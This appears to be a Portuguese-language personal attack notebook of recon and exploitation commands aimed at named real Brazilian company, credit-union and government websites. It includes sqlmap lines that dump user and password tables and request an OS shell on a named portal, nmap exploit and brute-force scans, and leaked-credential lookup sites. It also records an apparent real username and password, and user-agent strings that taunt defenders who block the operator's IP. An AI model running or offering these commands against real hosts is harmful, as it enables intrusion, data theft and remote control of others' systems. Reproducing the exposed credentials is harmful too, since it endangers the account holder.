
###FEROXBUSTER
sudo feroxbuster -u ghelere.com.br -n -x php,pdf,xls,docx,sql,ini,csv,bkp -s 200 -o feroxbusterRECON.TXT
sudo feroxbuster -u ghelere.com.br -x pdf -x js,html -x php txt json,docx -s 200
sudo feroxbuster -u ghelere.com.br --extract-links
sudo feroxbuster -u www.ghelere.com.br -x pdf -x js,html -x php txt xls,docx -o feroxbusterRECON.TXT

###GOOFUZZ
###############--->>> Roda Script subs.sh dentro da pasta /GooFuzz

git clone https://github.com/m3n0sd0n4ld/GooFuzz.git
cd GooFuzz && ./GooFuzz -t gheleretransportes.rhgestor.com.br -e extensions.txt
./GooFuzz -t ghelere.com.br -e extensions.txt
./GooFuzz -t gheleretransportes.rhgestor.com.br -w file.txt

##Liste arquivos, diretórios e até parâmetros por meio de uma lista de palavras
./GooFuzz -t gheleretransportes.rhgestor.com.br -w wordlists/words-100.txt -p 3

##Lista diretórios e arquivos especificando caminhos, palavras ou nomes de arquivo
./GooFuzz -t gheleretransportes.rhgestor.com.br -w /login/,password,db.html -p 3

##Exclusão de subdomínios em suas pesquisas (separados por vírgulas ou por uma lista)
Neste exemplo, removemos o subdomínio " wiki.earthdata.nasa.gov " da pesquisa.
./GooFuzz -t ghelere.com.br -w login -p 1

###Enumeração de subdomínios
A funcionalidade para listar subdomínios (parâmetro " -s ") e em conjunto com um número 
entre 10 e 20 páginas (parâmetro " -p "), é possível obter um grande número de subdomínios da organização.
./GooFuzz -t ghelere.com.br -s -p 20

####Arquivos encontrados contendo enumeração [TOP]
A funcionalidade de listar arquivos por seu conteúdo (parâmetro " -c "), é muito útil para 
identificar arquivos relevantes (por exemplo, contendo a palavra " senha "), mesmo que a palavra 
esteja em um arquivo de imagem (por exemplo, .png )
./GooFuzz -t ghelere.com.br -c password
./GooFuzz -t ghelere.com.br -c password , usuario , user

###Procure uma possível senha em um arquivo pdf:
./GooFuzz -t .ghelere.com.br -c changeme -e pdf

####DIRB
sudo dirb https://ghelere.com.br -o results_DIRB.TXT
sudo dirb https://ghelere.com.br /usr/share/dirb/wordlists/small.txt

sudo dirb https://ghelere.com.br /usr/share/wordlists/dirb/common.txt
dirb http://pmweb.com.br

####FFUF
sudo ffuf -c -u https://sistemagio.grupogiovanella.com.br/FUZZ -w /usr/share/wordlists/dirb/big.txt -mc 200
sudo ffuf -c -u https://idtrack.com.br/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt dir -x php,html,txt,csv,xls,xlsx,conf
sudo ffuf -c -u https://idtrack.com.br/FUZZ -w /usr/share/wordlists/dirb/common.txt dir -x php,html,txt,csv,xls,xlsx,conf

sudo ffuf -c -u https://ghelere.com.br/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200 | tee fuzzing.fuff
sudo ffuf -c -u https://ghelere.com.br/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,html,txt,csv,xls,xlsx,conf

sudo ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://FUZZ.ghelere.com.br -mc 200
sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://FUZZ.ghelere.com.br -mc 200

###METAGOOFIL - GERAR CONSULTA DE ARQUIVOS 
sudo metagoofil -d intersept.com.br -t doc,docx,ppt,pptx,xls,xlsx -l 50 -n 25 -o Intersept -f 
User: oscar.barufaldi
Senha: Racso@1998

 sql xls xlsx txt doc docx pdf ini 

##ANALISE DE BACK LINKS CHECKER
https://ahrefs.com/backlink-checker

###Documentos Vazados
https://buckets.grayhatwarfare.com/

https://reverseip.domaintools.com/
https://myip.ms/info/whois/200.250.74.130
https://www.maxmind.com/en/geoip-demo		   

###################################################
LOCALIZAR SISTEMAS E SUBDOMINIOS
###################################################
link:*ghelere.com.br
		   
		   
		   
###EXTRAIR URLs DE UM Dominio - URL-Extractor
https://www.bulkdachecker.com/url-extractor/		   
		   
###CONSULTA DE E-MAILS VAZADOS
https://phonebook.cz/

###Enumeração de Arquivos Contidos no Dominio
------------------------------------------------------------------------
###VERIFICAÇÃO DE INTERFACES ADMINISTRATIVAS
------------------------------------------------------------------------
sudo gobuster -u http://ghelere.com.br -w /usr/share/seclists/Discovery/Web-Content/common.txt dir
sudo gobuster -u http://ghelere.com.br -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt dir -x php,html,txt,csv,xls,xlsx,conf
sudo gobuster vhost -u http://dynamox.net -w /usr/share/wordlists/dirb/big.txt
sudo gobuster dir -u https://www.unisuam.edu.br -w /usr/share/dirb/wordlists/big.txt -r -e -x .php,.html,.htm,.bkp,.txt,.sql,.xls -s "200" 
sudo gobuster dns -d luzeoliveira.com.br -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
sudo gobuster vhost -u luzeoliveira.com.br -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
sudo gobuster dir -u https://luzeoliveira.com.br -w /usr/share/dirb/wordlists/big.txt -t 100 -e --no-error -r -o SITE
sudo gobuster dir -u https://luzeoliveira.com.br -w /usr/share/dirb/wordlists/big.txt -t 100 -e -r -s "200" -o Result_GoBuster_$rede
sudo gobuster dns -d luzeoliveira.com.br -w /usr/share/dirb/wordlists/big.txt -t 100 -e -r -s "200" -o Result_GoBuster_$rede
sudo gobuster dir -u https://www.sdp.org.br/ -w /usr/share/dirb/wordlists/big.txt -t 100 -r --no-error -e -x .php,.html,.htm,.bkp,.txt,.sql,.xls -s "200" 
sudo gobuster dir -u https://www.sdp.org.br/ -w /usr/share/wordlists/dirb/common.txt -n –wildcard -s "200"
sudo gobuster dir -u https://www.sdp.org.br/ -w /usr/share/wordlists/dirb/common.txt -f –wildcard -s "200"
sudo gobuster dir -u https://app.winker.com.br/intra/default/login -w /usr/share/dirb/wordlists/big.txt -e -t 100 -e --no-error -r -o SITE -x .php,.bkp,.old,.txt,.sql,.xls -s "200,400"
sudo gobuster dir -u https://webgiz.aix.com.br/sagradosul -w /usr/share/dirb/wordlists/big.txt -t 100 -e --no-error -r -o SITE
sudo gobuster dir -u https://www.sdp.org.br/ -w /usr/share/dirb/wordlists/big.txt -x .php,.html,.htm,.bkp,.txt,.sql,.xls 
sudo gobuster dir -u https://www.sdp.org.br/ -w /usr/share/dirb/wordlists/big.txt -t 100 -e -s "200"
sudo gobuster dir -u https://idtrak.com.br -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -e -t 100 -e --no-error -r -o SITE -x .php,.bkp,.old,.txt,.sql,.xls -s "200,400"
sudo gobuster dir -u https://www.sdp.org.br/ -w /usr/share/dirb/wordlists/big.txt -t 100 -e -s "200,301,302,401"
sudo gobuster dir -u https://lunelli.com.br/ -w /usr/share/dirb/wordlists/big.txt -t 100 -e --no-error -r -o SITE
sudo gobuster dir -u https://lunelli.com.br -w /usr/share/dirb/wordlists/big.txt -e -t 100 -e --no-error -r -o SITE -x .php,.bkp,.old,.txt,.sql,.xls
sudo gobuster dir -u https://webgiz.aix.com.br/sagradosul/ -w /usr/share/dirb/wordlists/big.txt -e -t 100 -e --no-error -r -o SITE -x .php,.bkp,.old,.txt,.sql,.xls
sudo gobuster dir -u https://webgiz.aix.com.br/sagradosul -w /usr/share/dirb/wordlists/big.txt -t 100 -e --no-error -r -o SITE
grep 200 SITE  --> LOCALIZA ARQUIVOS COM INTERFACE LOCALIZADA

##### FERRAMENTAS OSINT e Serviços Expostos [CENCYS / SHODAN / INTELX /

###CONSULTA DE HOSTS CENSYS
https://search.censys.io/search?q=polyterminais.com.br&resource=hosts

###CONSULTA DE HOSTS SHODAN
https://www.shodan.io/search?query=DYNAMOX
https://www.shodan.io/search?country:"BR" city:"curitiba" port:554
https://www.shodan.io/search?country:"BR" city:"curitiba" port:80

###CONSULTA DE HOSTS HUNTER
https://hunter.how/
https://www.shodan.io/search?query=DYNAMOX
https://search.censys.io/search?q=polyterminais.com.br&resource=hosts
https://webscout.io/lookup/isogama.com.br

##CONSULTAR IPS E EMAILS
https://webscout.io/lookup/isogama.com.br

##Ferramenta de Consulta de Servidores
https://onyphe.io/      			 

###CONSULTA Passive DNS
https://otx.alienvault.com/indicator/domain/igarashi.com.br

###CONSULTA DE CERTIFICADOS
https://crt.sh/?q=agricopel.com.br

###Ferramenta de Threat Intelligence **
https://fofa.info/       		

###CONSULTA DE RECON VARIAS PLATAFORMAS
https://intelx.io/tools?tab=domain

###Site de Consulta de Attack Surface - Racso@1998
https://app.binaryedge.io 				

##CONSULTAS POWERBI
site:app.powerbi.com/view?r intext:"br" and "cpf"

###ANALISE DE VULNERABILIDADES COM FERRAMENTAS EXTERNAS
https://pentest-tools.com/network-vulnerability-scanning/network-security-scanner-online-openvas
https://pentest-tools.com/website-vulnerability-scanning/website-scanner
https://urlscan.io/
https://www.virustotal.com/gui/home/url
https://leakix.net/   					  - Ferramenta de Threat Intelligence
https://fullhunt.io/      - Site de Consulta de Attack Surface
https://grep.app/	      - Site de Consulta de Codes
https://seanwright.notion.site/seanwright/Security-Resources-3d23a4bf6fde48cb98393fe3a19862d9
https://test.securityheaders.com/   [INCLUSÃO INDICADORES NO REPORT]
https://www.immuniweb.com/websec/
https://www.infobyip.com/
https://ipinfo.io/
https://www.nmmapper.com/sys/tools/subdomainfinder/
https://pulsedive.com/    - Ferramenta de Threat Intelligence
https://vulners.com/      - Site de Analise de Vulnerabilidades
https://crt.sh/           - Consulta de Certificado
https://wigle.net/        - Site de Consulta de Redes Wifi

###BUSCAR CREDENCIAIS VAZADAS
https://search.illicit.services/

###########################################################################

###S N I P E R ---------ANALISAR VULNERABILIDADES E ESTRUTURA DO AMBIENTE = RECON

###########################################################################
sudo sniper -t poly.log.br -o -m -re -fp -b 
sudo sniper -t henn.com.br -o -re -fp -b 
sudo sniper -f subs-ghelsudoere.com.br.txt -m nuke -w GHELERE
sudo sniper -f subs-intersept.com.br.txt -m massportscan -w INTERSEPT02
sudo sniper -t viacaoouroeprata.com.br -o -re
sudo sniper -t unesul.com.br -o -re
sudo sniper -t accesslogistics.com.br  -o -re




#####ARACHNI Ferramenta para Analise de Vulnerabilidades ARACHNI Web

wget https://github.com/Arachni/arachni/releases/download/v1.5.1/arachni-1.5.1-0.5.12-linux-x86_64.tar.gz
tar -xvf arachni-1.5.1-0.5.12-linux-x86_64.tar.gz
cd arachni
de bin
./arachni_web

cd arachni-1.6.1.3-0.6.1.1/bin/ && ./arachni_web

bin/arachni_web
 Administrator:
        E-mail address: admin@admin.admin
        Password:       administrator
				

===========================================================================================
                        Port Scanner Faixa de Ips dos Domínios 
ANALISE DE VULNERABILIDADES (CVEs e EXPLOITS) NO ENDEREÇO DA APLICAÇÃO PARA O RELATORIO
				###COMANDOS NMAP ADICIONAIS GERAÇÃO RELATORIO WEBMAP####
============================================================================================
sudo nmap --script-updatedb
nmap -sS -sV -T5 -A -v -n -Pn --top-ports 300 --max-retries=1 --open --script=vuln --script=exploit -oG CVEs_Vuls_Rede_Henn-01.txt 192.168.0.0/24
nmap -sS -sV -T5 -A -v -n -Pn --top-ports 300 --max-retries=1 --open --script=vuln --script=exploit -oG CVEs_Vuls_Rede_Henn-01.txt 192.168.1.0/24

nmap -sS -sV -T5 -A -v -n -Pn --top-ports 300 --max-retries=1 --open --script=vuln --script=exploit --script=mysql-brute -oG CVEs_Vuls_Rede_Henn-01.txt 192.168.0.0/24 --verbose
nmap -sS -sV -T5 -A -v -n -Pn --top-ports 300 --max-retries=1 --open --script=vuln --script=exploit --script=mysql-brute -oG CVEs_Vuls_Rede_Henn-01.txt 192.168.1.0/24 --verbose

###ANALISE DE IPS COLETADOS = SAIDA EM XML
sudo nmap -sS -sV -T3 -A -v -n --open --script=vuln --script=exploit --script=mysql-brute -iL ips.txt -oA CVEs_IPS_WTEC_Vuls.xml --verbose
###ANALISE DE IPS COLETADOS = SAIDA EM TXT
sudo nmap -sS -sV -T3 -A -v -n --open --script=vuln --script=exploit --script=mysql-brute -iL ips.txt -oG CVEs_IPS_HENN_Vuls.txt --verbose
sudo nmap -sS -sV -T3 -A -v -n --open --script=vuln --script=exploit --script=mysql-brute -iL ips.txt -oG CVEs_IPS_HENN_Vuls.xml --verbose
sudo nmap -sS -sV -T3 -A -v -n --open --script=vuln --script=exploit --script=mysql-brute 10.27.21.0/24 -oG CVEs_IPS_INT_Vuls.xml --verbose

============================================================================================
###ANALISE DE VULNERABILIDADES (CVEs e EXPLOITS) NO ENDEREÇO DA APLICAÇÃO PARA O RELATORIO
============================================================================================
sudo nmap -sS -sV -T3 -Pn -A -v -n --open --verbose --script=vuln --script=exploit --script-args mincvss=7.0 pedidos.henn.com.br
sudo nmap -sS -sV -T2 -A -v -n  --open --script=vuln --script=exploit,whois-domain,whois-ip crm.mastertechsistemas.com.br --verbose –data-string “Você está sendo analisado!! fica ligado!”
sudo nmap -sV --script=vuln --script-args mincvss=7.0 scan.targetit.com.br



********************************************************************************************
********************************************************************************************
============================================================================================
###EXPLORAÇÃO DE VULNERABILIDADES (CVEs e EXPLOITS) NO ENDEREÇO 
============================================================================================
sudo nmap --script-updatedb
sudo git clone https://github.com/vulnersCom/nmap-vulners.git /usr/share/nmap/scripts/vulners
sudo nmap --script-updated
##Scripts de NMAP
/usr/share/nmap/scripts

nmap -A -sV 135.125.106.255
nmap --script smb-vuln-ms17-010.nse 135.125.106.255

##Busca Shodan vsftpd 2.3.4
nmap -sV -Pn --script ftp-vsftpd-backdoor -p 21 104.200.17.125

##BUSCAR TODAS AS POSSIVEIS VULNERABILIDADES COM CVEs JA ASSOCIADOS *********************
cd /usr/share/nmap/scripts/vulners
nmap -sV -Pn -iL ips.txt --script=vulners/vulners.nse

sudo nmap -sS -sV -T3 -Pn -A -v -n --open --verbose --script=vuln --script=exploit --script-args mincvss=7.0 201.17.17.150
sudo nmap -sS -sV -T3 -A -v -n --open --script=vuln --script=exploit --script=mysql-brute -iL ips.txt -oG CVEs_IPS_HENN_Vuls.txt --verbose
searchsploit LINUX 2.4.37
##Verificar Vulnerabilidades
https://www.rapid7.com/db/
https://www.rapid7.com/db/?q=ms17-010&type=

##executar Metasploit
msfconsole

##videos
https://www.youtube.com/watch?v=-edzDjm0lvw

==================================================================================================
Indicadores de Risco – Base de Exploração de CVEs - SploitScan
https://github.com/xaitax/SploitScan?tab=readme-ov-file





============================================================================================
###ANALISAR VULNERABILIDADES (CVEs e EXPLOITS) DE UMA FAIXA DE REDE INTERNA OU IP EXTERNO
============================================================================================

nmap -sS -sV -T5 -A -v -n -Pn --top-ports 300 --max-retries=1 --open --script=vuln --script=exploit --script=mysql-brute -oG CVEs_Vuls_Rede_Henn-01.txt 192.168.0.0/24 --verbose
nmap -sS -sV -T5 -A -v -n -Pn --top-ports 300 --max-retries=1 --open --script=vuln --script=exploit --script=mysql-brute -oG CVEs_Vuls_Rede_Henn-01.txt 192.168.1.0/24 --verbose

##################################################################################################
##################################################################################################
#!/bin/bash
#Script para Realizar Enumeração
clear
echo -e "\e[1;32mRealizar Enumeração de Portas e Endereços\e[0m"
echo -n "Qual o Faixa de Rede ou Endereço ip que Deseja Analisar (192.168.0.1/24:"
read ip
echo -n "Qual Nome do Reporte :"
read nome
sudo nmap -sS -sV -T5 -A -v -n -Pn --top-ports 300 --max-retries=1 --open --script=vuln --script=exploit --script=mysql-brute -oG CVEs_Vuls_Rede_$nome.txt $ip --verbose
##################################################################################################
##################################################################################################

###Inventário de todas as máquinas de uma determinada rede
sudo nmap -sS -v -O -T3 -oA invent 192.168.0.0/24
sudo nmap -sS 192.168.0.1-200 -sS

sudo nmap -sU -p 161 -sV -sC scan.targetit.com.br ==> ENUMERAÇÃO DE SNMP
sudo snmp-check ENDEREÇO IP ==> ENUMERAÇÃO DE SNMP
#####Buscando falhas de DDoS
sudo nmap -sU -A -PN -n -pU:19,53,123,161 –script=ntp-monlist,dns-recursion,snmp-sysdescr + IP do alvo

============================================================================================
###ANALISAR VULNERABILIDADES (CVEs e EXPLOITS) DE UM AMBIENTE COM WORDPRESS
============================================================================================
sudo nmap -iL Resultado_HTTPX.txt -v -sS -Pn -A --open --script http-wordpress-brute.nse,http-wordpress-enum.nse,http-wordpress-users.nse
sudo nmap -v -sS -Pn -A --open --script http-wordpress-brute.nse,http-wordpress-enum.nse,http-wordpress-users.nse www.milium.com.br
sudo nmap 2017.adapcon.com.br -p8443 -sV -O -oG Vuls_Adapcon.com.br
cd /usr/share/nmap

###EXECUÇÃO NMAP COMPLETA
nmap -A -v -iL "D:\\Ips.txt" --script ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,http-brute,http-enum,http-methods,http-passwd,http-sql-injection,ldap-brute,mikrotik-routeros-brute,ms-sql-brute,ms-sql-config,ms-sql-dac,ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-hasdbaccess,ms-sql-info,ms-sql-ntlm-info,ms-sql-query,ms-sql-tables,ms-sql-xp-cmdshell,mysql-brute,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122,oracle-brute-stealth,oracle-brute,oracle-enum-users,oracle-sid-brute,oracle-tns-version,pgsql-brute,rdp-vuln-ms12-020,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-services,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-os-discovery,smb-system-info,smb-vuln-conficker,smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-vuln-regsvc-dos,smb-vuln-webexec,smb-webexec-exploit,targets-xml,vulners dns-fuzz,dns-nsec-enum,ftp-bounce,http-wordpress-enum,http-wordpress-users,ms-sql-brute,ms-sql-config,ms-sql-query,mysql-brute,mysql-enum,mysql-query,mysql-users,vulners,whois-domain,whois-ip
nmap -A -v -iL "D:\\Ips.txt" --script ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,http-brute,http-enum,http-passwd,vulners dns-fuzz,dns-nsec-enum,ftp-bounce,http-wordpress-enum,http-wordpress-users,ms-sql-brute,ms-sql-config,ms-sql-query,mysql-brute,mysql-enum,mysql-query,mysql-users,vulners,whois-domain,whois-ip



########################################################################################################################
										###ANALISAR VULNERABILIDADES DA SQL	
########################################################################################################################

##SQLMAP Realizando Ataque via resposta do HTTP
https://www.nanoshots.com.br/2015/07/explorando-falhas-de-sql-injection-com.html
sqlmap -r post --dbs --batch --random-agent 

########################################################################################################################
##SQLMP para verificar varias urls de uma lista
########################################################################################################################
sqlmap -m lista_de_urls.txt
Isso vai aumentar a intensidade dos testes e usar 5 threads para acelerar o processo.
sqlmap -m sqli.txt --dbs --batch --random-agent --level=3 --threads=5
sqlmap -m lista_de_urls.txt --level=3 --threads=5


sudo apt install --only-upgrade sqlmap

sudo sqlmap -u https://fv.henn.com.br/login/auth?login_error=3-2 --random-agent --dbs --batch --tamper=space2comment
sudo sqlmap -u https://www.viacaoouroeprata.com.br/site/ --dbs --batch --random-agent --threads 10
sudo sqlmap -u https://www.lghk.com/product.php?id=142&pid=4 --random-agent --dbs --batch
sudo sqlmap -u https://cargasweb.ouroeprata.com/Default.aspx?ReturnUrl=%2f --batch
sudo sqlmap -u https://agricopel.rhgestor.com.br/login/esqueci --dbs
sudo apt install --only-upgrade sqlmap


sudo sqlmap --url http://www.intersept.com.br:80/comente_post.php?id=273&id_post=273 --user-agent=SQLMAP--bat --level=5 --risk=3 --dbms=MYSQL
sudo sqlmap -v -u "http://minasca.com.br/single-produtos.php?id=23" -current-db --threads=10
sudo sqlmap -vv -u "https://www.artalimentos.com.br/fibras/fibratec-200" --dbs --threads=10
sudo sqlmap -vv -u "http://minasca.com.br/single-produtos.php?id=23"--threads=10 -D minascac_banco --tables
sudo sqlmap -vv -u "http://minasca.com.br/single-produtos.php?id=23"--threads=10 -D minascac_banco --tables -T produtos --columns
sudo sqlmap -vv -u "https://www.artalimentos.com.br/fibras/fibratec-200"--threads=10 -D DATABASE_NAME -T usuarios -C 'nome,email,senha' --dump
sudo sqlmap -vv -u "https://www.artalimentos.com.br/fibras/fibratec-200"--threads=10 -D DATABASE_NAME -T usuarios --dump
sudo sqlmap -vv -u "http://minasca.com.br/single-produtos.php?id=23"--threads=10 -D minascac_banco -T produtos --dump
sudo sqlmap -v -u "https://contaonline.viacredi.coop.br/" -current-db --threads=10

###############EXTRAÇÃO DE BASE DE DADOS############################
sqlmap -u https://portal.polyterminais.com.br/verifica-cpf/22222222* --random-agent --dbs --batch 
sqlmap -u https://portal.polyterminais.com.br/verifica-cpf/22222222* --random-agent --dbs --batch  --no-cast --tamper unmagicquotes.py,between.py,modsecurityzeroversioned.py,charencode.py --level 3 --risk 3 --flush-session 

sqlmap -u https://portal.polyterminais.com.br/verifica-cpf/22222222* -D ProtheusProd --tables --batch 
sqlmap -u https://portal.polyterminais.com.br/verifica-cpf/22222222* -D ProtheusProd --tables --batch --no-cast   or switch --hex
sqlmap -u https://portal.polyterminais.com.br/verifica-cpf/22222222* -D ProtheusProd --tables --batch --no-cast –-columns

sqlmap -u https://portal.polyterminais.com.br/verifica-cpf/22222222* -D ProtheusProd --tables --batch --random-agent --tamper unmagicquotes.py,between.py,modsecurityzeroversioned.py,charencode.py --level 3 --risk 3 --dbms=mysql --flush-session --dbs  

sqlmap -u https://portal.polyterminais.com.br/verifica-cpf/22222222* -D PolyAduaneiro --tables --batch --no-cast
sqlmap -u https://portal.polyterminais.com.br/verifica-cpf/22222222* -D AcessoPoly --tables --batch 
sqlmap -u https://portal.polyterminais.com.br/verifica-cpf/22222222* --random-agent --dbs --batch -D AcessoPoly -T Usuario --dump
sqlmap -u https://portal.polyterminais.com.br/verifica-cpf/22222222*  --random-agent --dbs 
sqlmap -u https://portal.poly.log.br/verifica-cpf/22222222* --random-agent --dbs --batch 
sqlmap -u https://portal.poly.log.br/verifica-cpf/22222222* --random-agent --os-shell
sqlmap -u https://portal.poly.log.br/verifica-cpf/22222222* --random-agent --proxy in sql


ANALISE DE VULNERABILIDADE SQL
https://github.com/ron190/jsql-injection

###rRECOMENDAVEL
sqlmap -u https://portal.poly.log.br/verifica-cpf/22222222* --random-agent --dbs --batch 
sqlmap -u https://ghelere.atua.com.br/adm/login.php --random-agent --dbs --batch 
sqlmap -u https://ghelere.atua.com.br/adm/* --random-agent --dbs --batch 

sqlmap -u https://materiais.hubcolmeia.com.br/desafix#rd-section-joq3m2lv --random-agent --dbs 

sqlmap -u https://scan.targetit.com.br/dist/main.js?version=%27%3B+sleep%283000%29%3B+var+x%3D%27* --random-agent --dbs 
sqlmap -u https://portal.polyterminais.com.br/verifica-cpf/22222222* --random-agent --dbs --batch -D PolyAduaneiro --tables   
sqlmap -u https://portal.poly.log.br/user/senha/recuperacao_senha* --random-agent --dbs --batch -D AcessoPoly -T Usuario --dump
sqlmap -u http://www.sindaeb.com.br/hp/dt_noticias.php?id=10* --random-agent --dbs --batch -D PolyAduaneiro --tables 
sqlmap --random-agent -u https://ead.pbh.gov.br/course/view.php?id=2391 --dbs

https://www.youtube.com/watch?v=PL5w7Glj7HM
https://www.teutoonline.com.br/admin/vendasEditar.php?i=482



########################################################################################################################
TESTES DE SQL INJECTION COM ghauri
https://github.com/r0oth3x49/ghauri
git clone https://github.com/r0oth3x49/ghauri.git
sudo python3 -m pip install --upgrade -r requirements.txt
sudo python3 setup.py install
ghauri -u  http://m.viacaoouroeprata.com.br/pesquisas/default.asp?Chave=OPENSURVEY&LoteID=828325 --dbs

########################################################################################################################


############################################################
####RAPIDSCAN – Verificar Vulnerabilidades de SQL INJECTION
############################################################

git clone https://github.com/skavngr/rapidscan.git /opt/
cd /opt/rapidscan
python3 -m pip install .
cd /opt/rapidscan/;./rapidscan.py https://sistemagio.grupogiovanella.com.br [USAR IPS]
./rapidscan.py --update


####SQLIFINDER – Verificar Vulnerabilidades de SQL INJECTION
git clone https://github.com/americo/sqlifinde
cd sqlifinder
pip3 install -r requirements.txt
sudo python3 sqlifinder.py -d ghelere.com.br -s true
sudo python3 sqlifinder.py -d onboarding.dyndns.org -s true

------------------------------------------------------------------------
###VERIFICAÇÃO DE INTERFACES ADMINISTRATIVAS
------------------------------------------------------------------------
gobuster -u http://dynamox.net -w /usr/share/seclists/Discovery/Web-Content/common.txt dir
gobuster -u http://dynamox.net -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt dir -x php,html,txt,csv,xls,xlsx,conf
gobuster vhost -u http://dynamox.net -w /usr/share/wordlists/dirb/big.txt

sudo ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u https://escriba.com.br/FUZZ
sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://luzeoliveira.com.br/FUZZ
sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://FUZZ.luzeoliveira.com.br/
sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://FUZZ.luzeoliveira.com.br/ -mc 200 
sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://luzeoliveira.com.br/FUZZ -mc 200
sudo ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u https://FUZZ.escriba.com.br/ -mc 200 
sudo ffuf -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36" -t 3 -w /usr/share/wordlists/dirb/big.txt -u https://getnet.brcaptura.com.br/FUZZ -mc 503 -v
sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://lunelli.com.br/FUZZ -mc 200
sudo wfuzz -c -f sub-fighter.txt -Z -w /usr/share/seclists/Discovery/Web-Content/common.txt -sc 200,202.204.301,302,307,403 http://FUZZ.teuto.com.br
sudo wfuzz -w /usr/share/wordlists/dirb/big.txt  -sc 200,202.204.301,302,307,403 http://FUZZ.teuto.com.br
sudo ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u https://FUZZ.teuto.com.br/ -mc 200
sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://FUZZ.teuto.com.br/ -mc 200
sudo ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://teuto.com.br/FUZZ -e .php -mc 200
sudo ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://teuto.com.br/FUZZ -e .php -mc 200
sudo ffuf -w /usr/share/wordlists/dirb/common.txt -u https://lunelli.com.br/FUZZ -mc 200
sudo ffuf -w /usr/share/wordlists/dirb/common.txt -u https://lunelli.com.br/FUZZ -mc 200
sudo ffuf -w /usr/share/wordlists/dirb/common.txt -u https://lunelli.com.br/FUZZ -mc 200
sudo ffuf -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36" -t 3 -w /usr/share/wordlists/dirb/big.txt -u https://contaonline.viacredi.coop.br/FUZZ -mc 503 -v
sudo ffuf -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) **FOFADA MORTAL** (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36" -t 3 -w /usr/share/wordlists/dirb/big.txt -u https://contaonline.viacredi.coop.br/FUZZ -mc 503 -v
sudo ffuf -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) **SEUS VIADOS** (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36" -t 3 -w /usr/share/wordlists/dirb/big.txt -u https://contaonline.viacredi.coop.br/servcorews/processJSON/FUZZ -mc 200 -v
sudo ffuf -u https://linxcommerce.adapcon.com.br/FUZZ -w /usr/share/seclists/raft-large-words.txt
sudo ffuf -H "User-Agent: Mozilla/5.0 (****SEUS VIADOS***) " -t 70 -w /usr/share/wordlists/dirb/big.txt -u https://contaonline.viacredi.coop.br//FUZZ -mc 200 -v && sudo ffuf -H "User-Agent: Mozilla/5.0 (****LIBEREM MEU IP***) " -t 70 -w /usr/share/wordlists/dirb/big.txt -u https://contaonline.viacredi.coop.br//FUZZ -mc 200 -v && sudo ffuf -H "User-Agent: Mozilla/5.0 (****LIBEREM MEU IP***) " -t 70 -w /usr/share/wordlists/dirb/big.txt -u https://contaonline.viacredi.coop.br//FUZZ -mc 200 -v && sudo ffuf -H "User-Agent: Mozilla/5.0 (****DANIEL - TIRA MEU IP***) " -t 70 -w /usr/share/wordlists/dirb/big.txt -u https://contaonline.viacredi.coop.br//FUZZ -mc 200 -v
sudo ffuf -H "User-Agent: Mozilla/5.0 (****Mozilla/7.3***) " -t 350 -w /usr/share/wordlists/dirb/big.txt -u https://ailosaproxima.coop.br/FUZZ -mc 200 -v 

sudo ffuf -H "User-Agent: Mozilla/5.0 (****Mozilla/7.3***) " -t 350 -w /usr/share/wordlists/dirb/big.txt -u https://contaonline.viacredi.coop.br/FUZZ -mc 200 -v 

sudo ffuf -H "User-Agent: Mozilla/5.0 (****Mozilla/7.3***) " -t 70 -w /usr/share/wordlists/dirb/big.txt -u https://sci10.com.br/FUZZ -mc 200 -v 
sudo ffuf -u https://www.isogama.com.br/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt 
sudo ffuf -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36" -t 3 -w /usr/share/wordlists/dirb/big.txt -u https://wwww.brcaptura.com.br/FUZZ -mc 200 -v
sudo ffuf -u contaonline.viacredi.coop.br/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -mc 200
